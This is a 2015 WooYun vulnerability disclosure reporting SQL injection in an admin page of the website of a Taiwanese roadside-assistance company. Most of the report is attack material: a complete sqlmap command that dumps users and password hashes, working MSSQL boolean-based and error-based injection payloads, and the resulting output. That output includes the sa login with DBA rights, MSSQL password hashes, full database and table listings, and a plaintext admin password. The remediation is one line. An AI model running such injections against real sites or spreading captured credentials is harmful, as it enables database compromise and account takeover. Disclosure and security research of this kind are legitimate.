当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154230

漏洞标题:TMS全鋒事業網站存在SQL植入漏洞(DBA权限\sa密码泄露\用户明文密码泄露)(臺灣地區)

相关厂商:TMS全鋒事業網站

漏洞作者: 路人甲

提交时间:2015-11-20 18:31

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

全鋒創立於民國77年(西元1988年),為台灣第一家提供24小時全年無休拖吊服務的汽車服務公司。以專業的道路救援為基礎,建立全面性的行車支援網路,使每位用車人都能「駕馭生活,享樂無限」。
全鋒以「行」為主軸,深化行車服務,建立「One Stop Solution」的行車支援平台,旗下陸續成立愛車防護、行動保修、加油站、貴賓專接、保險、客服、旅遊、生活玩家等8大事業體,服務範圍遍佈全臺,提供用車人完善的行車支援網路。
全鋒不斷地追求卓越、創新價值以提升服務品質,期望給予用車人高效率、更完善的服務;並將服務普及到全台每一個角落,便利行車每一刻,享受生活新境界,以達行車生活的無限可能。

详细说明:

地址:http://**.**.**.**/admin/Epaper/ugA_CEpaperView.asp?hidEpaperID=1407

python sqlmap.py -u "http://**.**.**.**/admin/Epaper/ugA_CEpaperView.asp?hidEpaperID=1407" -p hidEpaperID --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass

漏洞证明:

---
Parameter: hidEpaperID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hidEpaperID=1407 AND 2138=2138
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: hidEpaperID=1407 AND 5635=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5635=5635) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(106)+CHAR(113)))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current user:    'sa'
current user is DBA:    True
database management system users [3]:
[*] BUILTIN\\Administrators
[*] ezfunadmin
[*] sa
database management system users password hashes:
[*] BUILTIN\\Administrators [1]:
    password hash: NULL
[*] ezfunadmin [1]:
    password hash: 0x0100fe674a5f44013307c6e4789b250c036a82add2b438cc076109fdcecf3bd1372b175c5db0771189e1a1d132b7
        header: 0x0100
        salt: fe674a5f
        mixedcase: 44013307c6e4789b250c036a82add2b438cc0761
        uppercase: 09fdcecf3bd1372b175c5db0771189e1a1d132b7
[*] sa [1]:
    password hash: 0x01004827865f7bc9ec79a4545e78dbd38f7b2d5d498b119f51a1450f8ea1e1547923694bfd64fa38647695f05536
        header: 0x0100
        salt: 4827865f
        mixedcase: 7bc9ec79a4545e78dbd38f7b2d5d498b119f51a1
        uppercase: 450f8ea1e1547923694bfd64fa38647695f05536
Database: tms_gmap
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.GasStation                       | 436     |
| dbo.V_GasStation                     | 436     |
| dbo.SYArea                           | 366     |
| dbo.Data_Item                        | 103     |
| dbo.Login_ip                         | 72      |
| dbo.sysconstraints                   | 46      |
| dbo.SYCity                           | 25      |
| dbo.Permission                       | 12      |
| dbo.V_Permission                     | 12      |
| dbo.SiteMap                          | 9       |
| dbo.Category                         | 6       |
| dbo.ResourceType                     | 3       |
| dbo.syssegments                      | 3       |
| dbo.Roles                            | 2       |
| dbo.RoleUser                         | 1       |
| dbo.Store                            | 1       |
| dbo.Users                            | 1       |
| dbo.V_Users                          | 1       |
+--------------------------------------+---------+
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: TMS
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.ugCAR                            | 22936   |
| dbo.VIEW_AcctCar                     | 22908   |
| dbo.ugACCT                           | 21797   |
| dbo.ugView_Acct                      | 21797   |
| dbo.tb_gasvipdownload                | 20908   |
| dbo.ugCARVIEW                        | 16416   |
| dbo.Car_UserCard                     | 1980    |
| dbo.ugEPAPERC                        | 1649    |
| dbo.OilStation                       | 616     |
| dbo.ugACTION                         | 405     |
| dbo.sysconstraints                   | 160     |
| dbo.ugEPAPERMAIL                     | 133     |
| dbo.ugPHOTO                          | 101     |
| **.**.**.**d_list                        | 76      |
| dbo.ugEPAPERD                        | 75      |
| dbo.ugMAKER                          | 65      |
| dbo.ugMENUUSERITEM                   | 30      |
| dbo.DIY_TEMPCOMMAND_TABLE            | 29      |
| dbo.ugBLOGACTION                     | 24      |
| dbo.X_2515                           | 24      |
| dbo.X_7136                           | 21      |
| dbo.ugEPAPERA                        | 19      |
| dbo.ugMENU                           | 19      |
| dbo.ugALBUM                          | 18      |
| dbo.ugCOLOR                          | 18      |
| dbo.ugMENUUSER                       | 12      |
| dbo.ugCARCAT                         | 11      |
| dbo.ugACCTCAT                        | 10      |
| dbo.ugBLOGACTIONCAT                  | 10      |
| dbo.ugFORUM                          | 9       |
| dbo.ugBank                           | 8       |
| dbo.ugROADACTION                     | 8       |
| dbo.ugEPAPERB                        | 6       |
| dbo.ugMENUCAT                        | 5       |
| dbo.syssegments                      | 3       |
| dbo.ugFORUMCAT                       | 3       |
| dbo.Car_Usermodels                   | 2       |
| dbo.ugACCTACTION                     | 2       |
| dbo.tb_QuestionType                  | 1       |
| dbo.ugACCTACTIONCAT                  | 1       |
| dbo.ugACTIONCAT                      | 1       |
| dbo.ugCARSERVICE                     | 1       |
| dbo.ugEPAPERSET                      | 1       |
| dbo.ugHOMEIMG                        | 1       |
| dbo.ugROADACTIONCAT                  | 1       |
| dbo.VIEW_QuestionType                | 1       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.RTblRelships                     | 6922    |
| dbo.RTblIfaceHier                    | 3349    |
| dbo.RTblVersionAdminInfo             | 2333    |
| dbo.RTblVersions                     | 2333    |
| dbo.RTblNamedObj                     | 2196    |
| dbo.RTblIfaceMem                     | 1189    |
| dbo.RTblPropDefs                     | 797     |
| dbo.RTblClassDefs                    | 537     |
| dbo.backupfile                       | 492     |
| dbo.backupset                        | 486     |
| dbo.backupmediafamily                | 484     |
| dbo.backupmediaset                   | 484     |
| dbo.RTblIfaceDefs                    | 453     |
| dbo.RTblProps                        | 393     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 93      |
| dbo.RTblClassExtension               | 69      |
| dbo.RTblSites                        | 44      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 17      |
| dbo.sysalerts                        | 9       |
| dbo.sysdtscategories                 | 3       |
| dbo.syssegments                      | 3       |
| dbo.RTblDatabaseVersion              | 1       |
| dbo.sysdbmaintplans                  | 1       |
| dbo.systargetservers_view            | 1       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: EzFun
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.ugArea                           | 367     |
| dbo.ugActVoteRec                     | 278     |
| dbo.sysconstraints                   | 183     |
| dbo.ugCounter                        | 151     |
| dbo.ugAcct                           | 111     |
| dbo.ugCity                           | 57      |
| dbo.ugActVote                        | 42      |
| dbo.ugActForum                       | 28      |
| dbo.ugSurveySel                      | 21      |
| dbo.ugShopKind                       | 20      |
| dbo.ugSurveyRec                      | 15      |
| dbo.ugAcctCat                        | 10      |
| dbo.ugContinent                      | 10      |
| dbo.ugVendorCat                      | 10      |
| dbo.ugMenu                           | 9       |
| dbo.ugSurveyItem                     | 6       |
| dbo.ugSurveyCat                      | 5       |
| dbo.ugMenuCat                        | 4       |
| dbo.ugMenuUserItem                   | 4       |
| dbo.ugSurveyRecCat                   | 4       |
| dbo.syssegments                      | 3       |
| dbo.ugBonus                          | 3       |
| dbo.ugHeroBoard                      | 3       |
| dbo.ugMenuUser                       | 2       |
| dbo.ugSurvey                         | 2       |
| dbo.ugActCoSponsor                   | 1       |
| dbo.ugActVoteCat                     | 1       |
| dbo.ugBonusSet                       | 1       |
| dbo.ugHomeImg                        | 1       |
| dbo.ugVendor                         | 1       |
| dbo.ugView_Vendor                    | 1       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 3617    |
| INFORMATION_SCHEMA.COLUMNS           | 1309    |
| INFORMATION_SCHEMA.ROUTINES          | 1019    |
| dbo.spt_values                       | 730     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 302     |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 159     |
| INFORMATION_SCHEMA.TABLES            | 74      |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 63      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 34      |
| dbo.spt_server_info                  | 29      |
| INFORMATION_SCHEMA.VIEWS             | 26      |
| dbo.spt_provider_types               | 25      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 9       |
| dbo.syslogins                        | 3       |
| dbo.syssegments                      | 3       |
| dbo.MSreplication_options            | 2       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
| dbo.sysoledbusers                    | 1       |
+--------------------------------------+---------+
Database: model
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.Shippers                         | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: tms_gmap
Table: Users
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | nvarchar |
+----------+----------+
Database: tms_gmap
Table: V_Users
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | nvarchar |
+----------+----------+
Database: tms_gmap
Table: Store
[1 column]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| MailServerPassword | nvarchar |
+--------------------+----------+
Database: EzFun
Table: ugMenuUser
[1 column]
+--------------+-------+
| Column       | Type  |
+--------------+-------+
| SysAlterPass | nchar |
+--------------+-------+
Database: TMS
Table: Car_UserCard
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| User_Passwd | varchar |
+-------------+---------+
Database: TMS
Table: ugMENUUSER
[1 column]
+--------------+-------+
| Column       | Type  |
+--------------+-------+
| SysAlterPass | nchar |
+--------------+-------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: tms_gmap
Table: Users
[1 entry]
+----------+
| Password |
+----------+
| admin888 |
+----------+
Database: tms_gmap
Table: V_Users
[1 entry]
+----------+
| Password |
+----------+
| admin888 |
+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-24 08:07

厂商回复:

感謝通報

最新状态:

暂无